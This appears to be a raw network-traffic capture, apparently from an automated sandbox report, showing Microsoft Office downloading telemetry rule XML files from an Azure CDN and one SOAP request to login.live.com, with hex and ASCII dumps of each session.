                                                                                                                    2024-11-30 10:35:01 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:01 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:01 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 2160
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                    ETag: "0x8DC582BA3B95D81"
                                                                                                                    x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103501Z-174f7845968xr5c2hC1EWRd0hn0000000k8000000000155g
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:01 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    37192.168.2.44978513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:03 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:05 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:05 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 474
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                    ETag: "0x8DC582B9964B277"
                                                                                                                    x-ms-request-id: 25544c2c-a01e-00ab-8007-419106000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103505Z-174f7845968zgtf6hC1EWRqd8s0000000u8g000000004dy3
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:05 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    38192.168.2.44978613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:03 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:03 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:03 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 415
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                    ETag: "0x8DC582B9F6F3512"
                                                                                                                    x-ms-request-id: f5d49257-301e-005d-758c-3fe448000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103503Z-174f7845968qj8jrhC1EWRh41s00000011a0000000002f5r
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:03 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    39192.168.2.44978713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:03 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:08 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:08 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 471
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                    ETag: "0x8DC582BB10C598B"
                                                                                                                    x-ms-request-id: 724e5c80-801e-007b-4caf-42e7ab000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103508Z-174f7845968xlwnmhC1EWR0sv800000011600000000033e6
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:08 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    40192.168.2.44978813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:03 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:03 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:03 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 632
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                    ETag: "0x8DC582BB6E3779E"
                                                                                                                    x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103503Z-174f78459685m244hC1EWRgp2c0000001120000000008ffy
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:03 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    41192.168.2.44978913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:03 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:03 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:03 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 467
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                    ETag: "0x8DC582BA6C038BC"
                                                                                                                    x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103503Z-174f7845968glpgnhC1EWR7uec00000011e0000000006a6r
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:03 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    42192.168.2.44979113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:05 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:05 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:05 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 407
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                    ETag: "0x8DC582BBAD04B7B"
                                                                                                                    x-ms-request-id: bef9f1b5-c01e-007a-611b-41b877000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103505Z-174f7845968pght8hC1EWRyvxg00000004f0000000004gp9
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:05 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    43192.168.2.44979040.126.53.19443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:05 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/soap+xml
                                                                                                                    Accept: */*
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                    Content-Length: 3592
                                                                                                                    Host: login.live.com
                                                                                                                    2024-11-30 10:35:05 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                    2024-11-30 10:35:06 UTC653INHTTP/1.1 200 OK
                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                    Expires: Sat, 30 Nov 2024 10:34:06 GMT
                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                    FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.9
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    x-ms-route-info: C532_SN1
                                                                                                                    x-ms-request-id: a7821502-b26d-46e0-90ae-8eff78fc546d
                                                                                                                    PPServer: PPV: 30 H: SN1PEPF0003FB45 V: 0
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:05 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 11390
                                                                                                                    2024-11-30 10:35:06 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    44192.168.2.44979213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:05 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:05 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:05 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 486
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                    ETag: "0x8DC582BB344914B"
                                                                                                                    x-ms-request-id: 836dd7a0-401e-00ac-1e7d-400a97000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103505Z-174f7845968nxc96hC1EWRspw8000000110g000000006ppn
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:05 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    45192.168.2.44979313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:05 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:06 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:05 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 427
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                    ETag: "0x8DC582BA310DA18"
                                                                                                                    x-ms-request-id: c955d5f0-801e-00a0-7007-412196000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103505Z-174f7845968pght8hC1EWRyvxg00000004f0000000004gpc
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
